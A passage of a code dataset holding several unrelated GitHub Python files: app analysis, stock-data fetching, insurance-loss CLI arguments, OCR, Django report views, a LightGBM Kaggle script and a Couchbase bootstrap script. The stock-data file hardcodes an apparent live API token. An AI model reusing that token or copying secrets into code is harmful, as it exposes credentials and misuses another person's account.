{app_path}\".format(app_path=app_path))\n return unzip_dir\n\n find_path = os.path.join(payload_path, app_dir)\n anaylse_results = {}\n for anaylse_policy in self.anaylse_policies:\n anaylse_result = anaylse_policy.anaylse(find_path)\n self.combine_anaylse_results(anaylse_results, anaylse_result)\n\n self.take_notes(app_name, anaylse_results, app_downurl, app_ranking, app_column_id)\n return unzip_dir\n\n def combine_anaylse_results(self, anaylse_results, anaylse_result):\n \"\"\"将多次分析结果组合\n :param anaylse_results: 总的分析统计\n :param anaylse_result: 单次的分析结果\n :return:\n \"\"\"\n for key, value in anaylse_result.items():\n if key in anaylse_results:\n anaylse_results[key] = anaylse_results[key] + \", \" + value\n else:\n anaylse_results[key] = anaylse_result[key]\n\n def anaylse_apps(self):\n def open_file():\n fp = open(self.FILE_NAME_FOR_DOWNLOAD_25PP, \"r\")\n for line in fp:\n yield json.loads(line)\n fp.close()\n\n for i, app in enumerate(open_file()):\n logging.info('anaylse number {number} app {app_name} -----------------'.format(number=i, app_name=app['app_name']))\n if not app['files']:\n logging.warning(\"there is no ipa for this app - {app_name}\".format(app_name=app['app_name']))\n continue\n app_path = os.path.join(self.APPS_DIR, app['files'][0]['path'])\n app_name = app['app_name']\n app_downurl = app['app_downurl']\n app_ranking = app['ranking']\n app_column_id = app['column_id']\n unzip_dir = self.anaylse(app_path, app_name, app_downurl, app_ranking, app_column_id)\n if os.path.exists(unzip_dir): shutil.rmtree(unzip_dir) # 分析完删除该目录\n\n self.excel_writer.close()\n\n def take_notes(self, app_name, anaylse_results, app_downurl, app_ranking, app_column_id):\n app_column_name = self.app_column_id_2_name[app_column_id]\n if app_column_id not in self.column_id_set:\n self.column_id_set.add(app_column_id)\n self.excel_writer.write_head(app_column_name, args=self.sheet_head)\n\n args = [None] * len(self.sheet_head)\n args[0] = app_name\n args[1] = app_downurl\n for company, value in anaylse_results.items():\n index = self.sheet_head.index(company)\n args[index] = value\n self.excel_writer.write_record(app_column_name, requested_index=app_ranking + 1, args=args)\n\n\nif __name__ == '__main__':\n app_anaylse = AppAnaylse()\n app_anaylse.anaylse_apps()\n\n","repo_name":"echobfy/fyBaiCrawler","sub_path":"fyBaiCrawler/analyse/a25pp/app_anaylse.py","file_name":"app_anaylse.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43450941871","text":"import os\nimport tushare as ts\nimport pandas as pd\n\nts.set_token('2a502c019dd831077592283439e635b8a843b43da1ff16dfe53646b4')\npro = ts.pro_api()\ndef get_stock_list():\n if not os.path.exists('data/stock_list.csv'):\n data = pro.stock_basic(exchange='', list_status='L', fields='ts_code,symbol,name,area,industry,list_date')\n df = pd.DataFrame(data=data)\n print(df.columns)\n df.to_csv('data/stock_list.csv', index=False, encoding='utf-8')\n else:\n df = pd.read_csv('data/stock_list.csv')\n return df\n\ndef single_stock():\n df = pro.daily(ts_code='000001.SZ', start_date='2010701', end_date='20200730')\n print(df.shape)\n\nif __name__ == '__main__':\n single_stock()\n\n","repo_name":"lukegs7/python-projects","sub_path":"single_thread/money/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27307006399","text":"#!/usr/bin/env python\n\nimport argparse\nimport logging\n\nfrom oasislmf import __version__ as oasis_version\nfrom oasislmf.pytools.gul import manager, logger\n\nparser = argparse.ArgumentParser(\n usage='use \"%(prog)s --help\" for more information',\n formatter_class=argparse.RawTextHelpFormatter # for multi-line help text\n)\n\nparser.add_argument('-a', help='back-allocation rule', default=0, type=int, dest='alloc_rule')\nparser.add_argument('--ignore-correlation',\n help='if passed, peril correlation groups (if defined) are ignored for the generation of correlated samples',\n action='store_true', dest='ignore_correlation', default=False)\nparser.add_argument('-d', help='output random numbers instead of gul (default: False).',\n default=False, action='store_true', dest='debug')\nparser.add_argument('-i', '--file-in', help='filename of input stream.', action='store', type=str, dest='file_in')\nparser.add_argument('-o', '--file-out', help='filename of output stream.', action='store', type=str, dest='file_out')\nparser.add_argument('-L', help='Loss treshold (default: 1e-6)', default=1e-6,\n action='store', type=float, dest='loss_threshold')\nparser.add_argument('-S', help='Sample size (default: 0).', default=0, action='store', type=int, dest='sample_size')\nparser.add_argument('--peril-filter', help='Id of the peril to keep, if empty take all perils', nargs='+')\nparser.add_argument('-V', '--version', action='version', version='{}'.format(oasis_version))\nparser.add_argument('--ignore-file-type', nargs='*', help='the type of file to be loaded', default=set())\nparser.add_argument('--random-generator',\n help='random number generator\\n0: numpy default (MT19937), 1: Latin Hypercube. Default: 1.',\n default=1, type=int)\nparser.add_argument('--run-dir', help='path to the run directory', default='.')\nparser.add_argument('--logging-level',\n help='logging level (debug:10, info:20, warning:30, error:40, critical:50). Default: 30.',\n default=30, type=int)\n\n\ndef main():\n # parse arguments to variables\n # note: the long flag name (e.g., '--opt-one') is used as variable name (i.e, the `dest`).\n # hyphens in the long flag name are parsed to underscores, e.g. '--opt-one' is stored in `opt_one``\n kwargs = vars(parser.parse_args())\n\n # add handler to gul logger\n ch = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logging_level = kwargs.pop('logging_level')\n logger.setLevel(logging_level)\n\n manager.run(**kwargs)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OasisLMF/OasisLMF","sub_path":"oasislmf/pytools/gulpy.py","file_name":"gulpy.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"54"} +{"seq_id":"11626194844","text":"import cv2\nimport os\nimport numpy as np\nimport random\nimport pytesseract\npytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\nfrom multiprocessing import Pool\n\ndef scoreImgOCR(image):\n scoreImg = image\n if scoreImg.size == 0:\n return ''\n ### Threshold Preprocessing\n scoreImg, = thresholdPreprocess([scoreImg])\n\n ### get Each Digit ROI\n ROIs = getDigitsROI(scoreImg)\n ### OCR\n return getPredictText(ROIs)\n\ndef scoreboardOCR(scoreboardImg, cropData):\n ### Get Score Position by Format\n scoreImgs = getScoreImgs(scoreboardImg, cropData)\n # predictTexts = []\n # for scoreImg in scoreImgs:\n # predictTexts.append(scoreImgOCR(scoreImg))\n # return predictTexts\n with Pool(4) as p:\n return p.map(scoreImgOCR, scoreImgs)\n \ndef getScoreImgs(scoreboardImg, cropData):\n scoreImgs = []\n for idx, data in enumerate(cropData):\n # x, y, w, h = data\n # scoreImgs.append(scoreboardImg[y:y+h, x:x+w].copy())\n x1, y1, x2, y2 = data\n scoreImgs.append(scoreboardImg[y1:y2, x1:x2].copy())\n return scoreImgs\n\ndef thresholdPreprocess(images):\n for idx, image in enumerate(images):\n\n ### cvtColor to gray\n images[idx] = cv2.cvtColor(images[idx], cv2.COLOR_BGR2GRAY)\n\n ### threshold\n _, images[idx] = cv2.threshold(images[idx], 0, 255, cv2.THRESH_OTSU)\n\n ### convert to black background white word\n count_white = np.sum(images[idx] > 0)\n count_black = np.sum(images[idx] == 0)\n if count_white > count_black:\n images[idx] = 255 - images[idx]\n return images\n\ndef getDigitsROI(image):\n ImgH, ImgW = image.shape\n totalArea = ImgH*ImgW\n retval, labels, stats, centroids = cv2.connectedComponentsWithStats(image, connectivity=4)\n\n ROIs = []\n xPos = []\n for idx, statistic in enumerate(stats):\n areaProportion = round(100*statistic[4]/totalArea, 2)\n if areaProportion > 5.0 and areaProportion < 50.0:\n x, y, w, h = statistic[0:4]\n ROI = image[y:y+h,x:x+w].copy()\n\n ### ROI resize\n parameter = 32/h\n ROI = cv2.resize(ROI, (int(w*parameter), int(h*parameter)), interpolation=cv2.INTER_NEAREST)\n\n ### ROI paddding\n yAxisPadding = max(0, int((52-h)/2))\n xAxisPadding = max(0, int((51-w)/2))\n ROI = cv2.copyMakeBorder(ROI, yAxisPadding, yAxisPadding, xAxisPadding, xAxisPadding, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n \n ### convert to white background black word\n ROI = 255 - ROI\n\n ROIs.append(ROI)\n xPos.append(x)\n ### Sort ROIs\n sortedROIs = [ROI for _,ROI in sorted(zip(xPos,ROIs), key=lambda pair: pair[0])]\n return sortedROIs\n\ndef getPredictText(ROIs, lang=\"TableTennis\", cong=\"--oem 3 --psm 13 -c tessedit_char_whitelist=0123456789\"):\n texts = []\n for ROI in ROIs:\n boxes = pytesseract.image_to_boxes(ROI, lang=lang, config=cong)\n for b in boxes.splitlines():\n b = b.split(' ')\n texts.append(b[0])\n if len(texts) == 0:\n return ''\n else:\n return ''.join(texts)\n\nif __name__ == '__main__':\n # imagePath = r\"../images/video1_classified/2_3_10_11/frame19750.png\"\n # scoreboardImg = cv2.imread(imagePath)\n # print(scoreboardOCR(scoreboardImg, cropData=video1_cropData))\n \n scoreImgs = []\n imagePath = r\"../images/video2_digits/baseline/originAvg/0\"\n fileNames = os.listdir(imagePath)\n correct = 0\n total = 0\n for fileName in fileNames:\n image = cv2.imread(os.path.join(imagePath, fileName))\n image, = thresholdPreprocess([image])\n\n ROIs = getDigitsROI(image)\n if getPredictText(ROIs) == '0':\n correct = correct+1\n # else:\n # cv2.imshow('ROIs[0]', ROIs[0])\n # cv2.waitKey(0)\n total = total+1\n print('correct = ', correct)\n print('total = ', total)","repo_name":"AceBenson/Scoreboard-Analysis","sub_path":"DigitsRecognition/scoreboardOCR.py","file_name":"scoreboardOCR.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31719765789","text":"#LinearSearch\ndef Linear_Search(arr1,x): \n for i in range(len(arr1)):\n if arr1[i]==x:\n return i\n return -1 #If not present\n \narr=[int(x) for x in input(\"Enter elements in an array \").split()]\nk=int(input(\"Enter Search Element\"))\nindex=Linear_Search(arr,k)\nif(index!=-1):\n print(\"The element is present at index\"+str(index))\nelse:\n print(\"The element is not present\")","repo_name":"vikasini55/DataStructures1","sub_path":"LinearSearch.py","file_name":"LinearSearch.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5645434394","text":"from Aircraft import Aircraft\n\nclass Carrier:\n def __init__(self, initial_ammo, health_point):\n self.__aircrafts = []\n self.__initial_ammo = initial_ammo\n self.__ammo = initial_ammo\n self.__health_point = health_point\n\n def add(self, aircraft: Aircraft):\n self.__aircrafts.append(aircraft)\n\n# region - Not yet implemented:\n# If there is not enough ammo then it should start to fill the aircrafts with priority first\n# endregion\n\n # It should fill all the aircraft with ammo and\n # subtract the needed ammo from the ammo storage\n def fill(self):\n # If there is no ammo when this method is called, it should throw an exception\n if self.__ammo <= 0:\n raise Exception(\"Sorry, no ammo enough\")\n\n for aircraft in self.__aircrafts:\n if self.__ammo <=0:\n break\n\n self.__ammo = aircraft.refill(self.__ammo)\n","repo_name":"talathkhaleel1/learning","sub_path":"application_development/app_dev_with_inheritance/Aircraft/Carrier.py","file_name":"Carrier.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16748401386","text":"import json\nimport os\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.staticfiles import finders\nfrom django.http import HttpRequest, HttpResponse\nfrom django.urls import reverse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\n\nfrom .services.files import handle_uploaded_file\nfrom .services.analyzer import analyzeExcelFile\nfrom .services.cleaner import clean_data\nfrom .services.symanto import symanted_data\nfrom .services.diffuser import fuzzed_data\n\nfrom django.conf import settings\n\n\n@login_required(login_url='login')\ndef dashboard(request):\n methodIsPOST = request.method == 'POST'\n\n course = request.POST['course'] if methodIsPOST else None\n professor = request.POST['professor'] if methodIsPOST else None\n filename = request.POST['filename'] if methodIsPOST else request.GET.get(\n 'filename', None)\n\n if filename != None:\n context = analyzeExcelFile(filename, professor, course)\n return render(request, 'dashboard/index.html', context)\n else:\n context = {\n 'error': f'File {filename} not exist. Upload any other file.'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n\ndef download_report(request):\n show_preview = request.GET.get('preview', 'false') == 'true'\n professor = request.GET.get('professor', None)\n course = request.GET.get('course', None)\n emotionsObject = request.GET.get('emotions', '{}')\n\n emotionsObject = json.loads(emotionsObject)\n\n emotions = []\n values = []\n\n for emotion, value in emotionsObject.items():\n emotions.append(emotion)\n values.append(value)\n\n rangeE = list(range(0, len(emotions), 2))\n\n context = {\n 'professor': professor,\n 'course': course,\n 'emotions': emotions,\n 'values': values,\n 'range': rangeE\n }\n\n if show_preview:\n return render(request, 'dashboard/report_view_new.html', context=context)\n else:\n # return render(request, 'dashboard/report_view.html', context=context)\n # Obtener el HTML generado con información.\n template = get_template('dashboard/report_view.html')\n html = template.render(context)\n\n # Crear el objeto HttpResponse con el tipo MIME apropiado para el archivo PDF.\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mi_archivo.pdf\"'\n\n # Convertir el HTML a un archivo PDF utilizando xhtml2pdf y la función de callback.\n pisa_status = pisa.CreatePDF(\n html, dest=response, link_callback=link_callback)\n\n # Si la conversión a PDF falla, devolver un mensaje de error.\n if pisa_status.err:\n return HttpResponse('Error al generar el archivo PDF')\n\n # Devolver la respuesta con el archivo PDF generado.\n return response\n\n\ndef link_callback(uri, rel):\n \"\"\"\n Convert HTML URIs to absolute system paths so xhtml2pdf can access those\n resources\n \"\"\"\n result = finders.find(uri)\n if result:\n if not isinstance(result, (list, tuple)):\n result = [result]\n result = list(os.path.realpath(path) for path in result)\n path = result[0]\n else:\n sUrl = settings.STATIC_URL # Typically /static/\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\n mUrl = settings.MEDIA_URL # Typically /media/\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\n\n if uri.startswith(mUrl):\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\n elif uri.startswith(sUrl):\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\n else:\n return uri\n\n # make sure that file exists\n if not os.path.isfile(path):\n raise Exception(\n 'media URI must start with %s or %s' % (sUrl, mUrl)\n )\n return path\n\n\n@login_required(login_url='login')\ndef upload_file(request: HttpRequest):\n if request.method == 'GET':\n return render(request, 'dashboard/upload_file.html')\n\n file = request.FILES['file'] if 'file' in request.FILES else None\n\n # Upload file\n uploaded, filename, err = handle_uploaded_file(file)\n\n if not uploaded:\n context = {\n 'error': f'There was an error uploading the file: {filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File uploaded to {filename}')\n\n # Clean data\n cleaned, cleaned_filename, err = clean_data(filename, 'words-cache.temp')\n\n if not cleaned:\n context = {\n 'error': f'There was an error cleaning the file: {filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File cleaned to {cleaned_filename}')\n\n # Symante logic data\n symanted, symante_filename, err = symanted_data(\n cleaned_filename, 'symanto-cache.temp')\n\n if not symanted:\n context = {\n 'error': f'There was an error symanting the file: {cleaned_filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File symanted to {symante_filename}')\n\n # Diffuse logic data\n diffused, diffused_filename, err = fuzzed_data(symante_filename)\n\n if not diffused:\n context = {\n 'error': f'There was an error symanting the file: {symante_filename}. Please try again.',\n 'error_debug': f'{err.with_traceback()}'\n }\n return render(request, 'dashboard/upload_file.html', context)\n\n print(f'[INFO]: File diffused to {diffused_filename}')\n\n # Analyze data in dashboard view\n return redirect(reverse('dashboard') + f'?filename={diffused_filename}')\n","repo_name":"Scoowy/django-do-deploy","sub_path":"fuzzysystem/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2481631305","text":"# -*- coding: utf-8 -*-\r\n# -----------------------------------------------------------------------------\r\n# LightGBM regression example\r\n# https://www.kaggle.com/tobikaggle/humble-lightgbm-starter/\r\n# __author__ = \"DDgg\"\r\n# https://www.kaggle.com/c/mercedes-benz-greener-manufacturing\r\n# -----------------------------------------------------------------------------\r\nimport numpy as np\r\nimport lightgbm as lgb\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# ----------------------------------------------------------------------------\r\n# Display PCA, ICA, t-SNE add to see skewness\r\n# -----------------------------------------------------------------------------\r\n\r\n# data imnport \r\n# fork of forks from https://www.kaggle.com/jaybob20/starter-xgboost\r\n# Any results you write to the current directory are saved as output.\r\ntrain = pd.read_csv('../input/train.csv')\r\ntest = pd.read_csv('../input/test.csv')\r\n\r\n#pca_3D_plot(test)\r\n\r\nfor c in train.columns:\r\n if train[c].dtype == 'object':\r\n lbl = LabelEncoder() \r\n lbl.fit(list(train[c].values) + list(test[c].values)) \r\n train[c] = lbl.transform(list(train[c].values))\r\n test[c] = lbl.transform(list(test[c].values))\r\n\r\n# shape \r\nprint('Shape train: {}\\nShape test: {}'.format(train.shape, test.shape))\r\n \r\n#------------------------------------------------------------------------------\r\n# pca transform forked from https://www.kaggle.com/jaybob20/starter-xgboost/code\r\n# pca and Ica transform from https://www.kaggle.com/uluumy/mercedez-baseline-2\r\n# OLD The rmse of prediction is: 7.3375551233\r\n\r\n##Add decomposed components: PCA / ICA etc.\r\nfrom sklearn.decomposition import PCA, FastICA\r\n\r\n## optimize and display number of components // whole dataset\r\n# 5 comp: The r2 is: 0.691174519763 the rmse is: 7.04535736811\r\n# 10 comp: The r2 is: 0.709094189016 the rmse is: 6.83789870052\r\n# 20 comp: The r2 is: 0.726726138723 the rmse is: 6.6274355197\r\n# 30 comp: The r2 is: 0.742673315642 the rmse is: 6.4311535142\r\n# 40 comp: The r2 is: 0.747617698519 the rmse is: 6.36906839436\r\n# 60 comp: The r2 is: 0.988973825782 the rmse is: 1.33124775841\r\n# 80 comp: The r2 is: 0.990269624615 the rmse is: 1.25057937524\r\n# 20L The r2 is: 0.993219353078 the rmse is: 1.04395560348\r\n# 40L The r2 is: 0.998705771167 the rmse is: 0.456091522319\r\n# 100 comp: The r2 is: 0.991084646309 the rmse is: 1.19705954246\r\n# 160 comp: The r2 is: 0.992118848356 the rmse is: 1.12548913381\r\n# 200 comp: The r2 is: 0.993216736475 the rmse is: 1.04415701154\r\n# 300 comp: The r2 is: \r\n# 377 comp The r2 is: 0.99903249422 the rmse is: 0.394342194068\r\n#----------------------------------------------------------------\r\n## 80/20 split with random_state=123\r\n\r\n# 2 comp: The r2 is: 0.638091262363 the rmse is: 7.35414169879\r\n# 5 comp: The r2 is: 0.639438224827 the rmse is: 7.34044351212\r\n# 6 comp: The r2 is: 0.648019302812 the rmse is: 7.2525692268\r\n# 7 comp: The r2 is: 0.638189248199 the rmse is: 7.35314607417\r\n# 10 comp: The r2 is: 0.637207039653 the rmse is: 7.36312011156\r\n# 20 comp: The r2 is: 0.633268557399 the rmse is: 7.4029792608\r\n# 30 comp: The r2 is: 0.632985260523 the rmse is: 7.40583807761\r\n# 40 comp: The r2 is: 0.632551562409 the rmse is: 7.4102124928\r\n# 80 comp: The r2 is: 0.629313920054 the rmse is: 7.44278713255\r\n# 100 comp: The r2 is: 0.628919943592 the rmse is: 7.44674129266\r\n# 200 comp: The r2 is: 0.623010420635 the rmse is: 7.50580249174\r\n# 300 comp: The r2 is: 0.620508076124 the rmse is: 7.53067193139 \r\n# 377 comp: The r2 is: 0.627785004593 the rmse is: 7.45812043387\r\nn_comp = 6\r\n\r\n# PCA\r\npca = PCA(n_components=n_comp, random_state=42)\r\npca2_results_train = pca.fit_transform(train.drop([\"y\"], axis=1))\r\npca2_results_test = pca.transform(test)\r\n\r\n# ICA\r\nica = FastICA(n_components=n_comp, random_state=42)\r\nica2_results_train = ica.fit_transform(train.drop([\"y\"], axis=1))\r\nica2_results_test = ica.transform(test)\r\n\r\n# Append decomposition components to datasets\r\nfor i in range(1, n_comp+1):\r\n train['pca_' + str(i)] = pca2_results_train[:,i-1]\r\n test['pca_' + str(i)] = pca2_results_test[:, i-1]\r\n \r\n train['ica_' + str(i)] = ica2_results_train[:,i-1]\r\n test['ica_' + str(i)] = ica2_results_test[:, i-1]\r\n \r\n \r\n# remove duplicates - needs to be applied to test too\r\n# train = train.T.drop_duplicates().T\r\n# test = test.T.drop_duplicates().T\r\n\r\n \r\ny_train = train[\"y\"]\r\ny_mean = np.mean(y_train)\r\ntrain.drop('y', axis=1, inplace=True)\r\n\r\n#------------------------------------\r\n# split into training and validation set\r\n# the data has a number of outliers, so the validation size needs\r\n# to be large enough plus cross-validation is needed\r\n\r\n# RND= 123 The r2 is: 0.648019302812 the rmse is: 7.2525692268\r\n# RND= 63466 The r2 is: 0.702588909905 the rmse is: 6.24188256127\r\n\r\nX_train, X_valid, y_train, y_valid = train_test_split(\r\n train, y_train, test_size=0.2, random_state=9127)\r\n\r\n# bad bad\r\n# X_train = train\r\n# X_valid = train\r\n# y_train = y_train\r\n# y_valid = y_train\r\n\r\n# create dataset for lightgbm\r\nlgb_train = lgb.Dataset(X_train, y_train)\r\nlgb_valid = lgb.Dataset(X_valid, y_valid, reference=lgb_train)\r\n\r\n# to record eval results for plotting\r\nevals_result = {} \r\n\r\n# The r2 is: 0.648019302812 the rmse is: 7.2525692268\r\n# specify your configurations as a dict\r\nparams = {\r\n 'task': 'train',\r\n 'boosting_type': 'gbdt',\r\n 'objective': 'regression',\r\n 'metric': {'l2'},\r\n 'num_leaves': 5,\r\n 'learning_rate': 0.06,\r\n 'max_depth': 4,\r\n 'subsample': 0.95,\r\n 'feature_fraction': 0.9,\r\n 'bagging_fraction': 0.85,\r\n 'bagging_freq': 4,\r\n 'min_data_in_leaf':4,\r\n 'min_sum_hessian_in_leaf': 0.8,\r\n 'verbose':10\r\n}\r\n\r\nprint('Start training...')\r\n\r\n# train\r\ngbm = lgb.train(params,\r\n lgb_train,\r\n num_boost_round=8000, # 200\r\n valid_sets=[lgb_train, lgb_valid],\r\n evals_result=evals_result,\r\n verbose_eval=10,\r\n early_stopping_rounds=50) # 50\r\n\r\n#print('\\nSave model...')\r\n# save model to file\r\n#gbm.save_model('model.txt')\r\n\r\nprint('Start predicting...')\r\n# predict\r\ny_pred = gbm.predict(X_valid, num_iteration=gbm.best_iteration)\r\n\r\nprint('\\nFeature names:', gbm.feature_name())\r\n\r\nprint('\\nCalculate feature importances...')\r\n\r\n# feature importances\r\nprint('Feature importances:', list(gbm.feature_importance()))\r\n\r\n# -------------------------------------------------------\r\nprint('Plot metrics during training...')\r\nax = lgb.plot_metric(evals_result, metric='l2')\r\nplt.show()\r\n\r\nprint('Plot feature importances...')\r\nax = lgb.plot_importance(gbm, max_num_features=10)\r\nplt.show()\r\n# -------------------------------------------------------\r\n# eval r2-score \r\nfrom sklearn.metrics import r2_score\r\nr2 = r2_score(y_valid, y_pred)\r\n\r\n# eval rmse (lower is better)\r\nprint('\\nThe r2 is: ',r2, 'the rmse is:', mean_squared_error(y_valid, y_pred) ** 0.5)\r\n\r\n# -------------------------------------------------------\r\nprint('\\nPredicting test set...')\r\ny_pred = gbm.predict(test, num_iteration=gbm.best_iteration)\r\n\r\n# y_pred = model.predict(dtest)\r\noutput = pd.DataFrame({'id': test['ID'], 'y': y_pred})\r\noutput.to_csv('submit-lightgbm-ICA-PCA.csv', index=False)\r\n\r\n# -----------------------------------------------------------------------------\r\nprint(\"Finished.\")\r\n# -----------------------------------------------------------------------------\r\n\r\n#==============================================================================\r\n# # Grid search example // uncomment block if needed\r\n# from sklearn.model_selection import GridSearchCV\r\n# estimator = lgb.LGBMRegressor()\r\n# \r\n# print(\"\\n-----------------------------------------------------------------------------\")\r\n# #==============================================================================\r\n#==============================================================================\r\n# print(\"Now doing grid search.\")\r\n# \r\n# # get possible parameters\r\n# estimator.get_params().keys()\r\n# \r\n# # fill parameters ad libitum\r\n# param_grid = {\r\n# 'num_leaves': [2, 5, 10, 20], \r\n# 'learning_rate': [0.06],\r\n# 'n_estimators': [100],\r\n# # 'colsample_bytree' :[],\r\n# # 'min_split_gain' :[],\r\n# # 'subsample_for_bin' :[],\r\n# 'max_depth' :[1,2,3,4,5,10],\r\n# # 'subsample' :[], \r\n# # 'reg_alpha' :[], \r\n# # 'max_drop' :[], \r\n# # 'gaussian_eta' :[], \r\n# # 'drop_rate' :[], \r\n# # 'silent' :[], \r\n# # 'boosting_type' :[], \r\n# # 'min_child_weight' :[], \r\n# # 'skip_drop' :[], \r\n# # 'learning_rate' :[], \r\n# # 'fair_c' :[], \r\n# # 'seed' :[], \r\n# # 'poisson_max_delta_step' :[], \r\n# # 'subsample_freq' :[], \r\n# # 'max_bin' :[], \r\n# # 'n_estimators' :[], \r\n# # 'nthread' :[], \r\n# # 'min_child_samples' :[], \r\n# # 'huber_delta' :[], \r\n# # 'use_missing' :[], \r\n# # 'uniform_drop' :[], \r\n# # 'reg_lambda' :[], \r\n# # 'xgboost_dart_mode' :[], \r\n# # 'objective'\r\n# }\r\n# \r\n# \r\n# gbm = GridSearchCV(estimator, param_grid)\r\n# \r\n# gbm.fit(X_train, y_train)\r\n# \r\n# # list them\r\n# print('Best parameters found by grid search are:', gbm.best_params_)\r\n# print(\"finished grid search\")\r\n#==============================================================================\r\n# -----------------------------------------------------------------------------","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/mercedes-benz-greener-manufacturing/DDgg/humble-lightgbm-starter.py","file_name":"humble-lightgbm-starter.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"71541975201","text":"\nimport urllib2\nimport json \nimport subprocess\nimport os\nimport time\nimport sys\nimport argparse\n\n\"\"\"\nThis script attempts to bootstrap this machine into a couchbase cluster using the\ncbbootstrap REST API.\n\nIt assumes:\n\n- The cbbootstrap REST api is available at CBBOOTSTRAP_API_URL\n- Couchbase Server is installed locally, but not initialized\n\n\"\"\"\n\n# This is an AWS Lambda function running behind a API Gateway. The code is available at https://github.com/couchbase/cbbootstrap\nCBBOOTSTRAP_API_URL = \"https://5e61vqxs5f.execute-api.us-east-1.amazonaws.com/Prod/cluster\"\n\ncouchbase_server_bin_path = \"/opt/couchbase/bin\"\ncouchbase_server_admin_port = \"8091\"\ncouchbase_cli_abs_path = os.path.join(\n couchbase_server_bin_path,\n \"couchbase-cli\",\n)\ncouchbase_server_bucket_type = \"couchbase\"\ncouchbase_server_bucket_replica = 1\n \nclass CouchbaseCluster:\n\n def __init__(self, cluster_id, node_ip_addr_or_hostname=\"\"):\n self.cluster_id = cluster_id\n self.node_ip_addr_or_hostname = node_ip_addr_or_hostname\n\n def SetAdminCredentials(self, admin_user, admin_pass):\n self.admin_user = admin_user\n self.admin_pass = admin_pass\n \n \n def CreateOrJoin(self):\n\n \"\"\"\n Call out to cbbootstrap REST API with cluster_id and hostname\n Depending on response, either create new cluster or join existing\n \"\"\"\n\n self.CBBootstrapCreateOrJoin()\n if self.is_initial_node:\n self.Create()\n else:\n self.Join()\n\n\n def CBBootstrapCreateOrJoin(self):\n \"\"\"\n Call out to the cbbootrap REST API and do a POST request to create or join\n a cluster\n \"\"\"\n\n # POST request\n params = {\n 'cluster_id': self.cluster_id,\n 'node_ip_addr_or_hostname': self.node_ip_addr_or_hostname,\n }\n req = urllib2.Request(CBBOOTSTRAP_API_URL,\n headers = {\n \"Content-Type\": \"application/json\",\n },\n data = json.dumps(params), # Since adding data, automatically makes it a POST request\n )\n response = urllib2.urlopen(req)\n self.__cbbootstrap_load_properties_from_json_response(response)\n\n\n\n def CBBootstrapGetClusterInfo(self):\n \"\"\"\n Given a cluster_id, query the cbbootrap rest API and find IP addr or hostname\n of initial couchbase server node\n \"\"\"\n\n # POST request\n params = {\n 'cluster_id': self.cluster_id,\n }\n url = \"{}/get_status\".format(CBBOOTSTRAP_API_URL)\n req = urllib2.Request(url,\n headers={\n \"Content-Type\": \"application/json\",\n },\n data=json.dumps(params), # Since adding data, automatically makes it a POST request\n )\n response = urllib2.urlopen(req)\n self.__cbbootstrap_load_properties_from_json_response(response)\n\n\n def CBBootstrapGetClusterInfoRetry(self):\n self.Retry(self.CBBootstrapGetClusterInfo)\n\n def __cbbootstrap_load_properties_from_json_response(self, json_response):\n\n data = json.load(json_response)\n print(\"Server response: {}\".format(data))\n self.cluster_id = data[\"cluster_id\"]\n self.initial_node_ip_addr_or_hostname = data[\"initial_node_ip_addr_or_hostname\"]\n self.is_initial_node = data[\"is_initial_node\"]\n\n\n def Create(self):\n\n self.WaitUntilLocalCouchbaseServerRunning()\n \n self.ClusterInitRetry()\n\n # This is to prevent node-init failures if we try to call\n # node-init \"too soon\". Since node-init hasn't been called, the\n # server-list command will return:\n # ns_1@127.0.0.1 172.31.21.40:8091 healthy active\n self.WaitUntilNodeHealthy(\"127.0.0.1\")\n\n # Workaround attempt for https://issues.couchbase.com/browse/MB-23079\n time.sleep(2)\n\n self.NodeInitRetry()\n \n def ClusterInit(self):\n\n subprocess_args = [\n couchbase_cli_abs_path,\n \"cluster-init\",\n \"-c\",\n 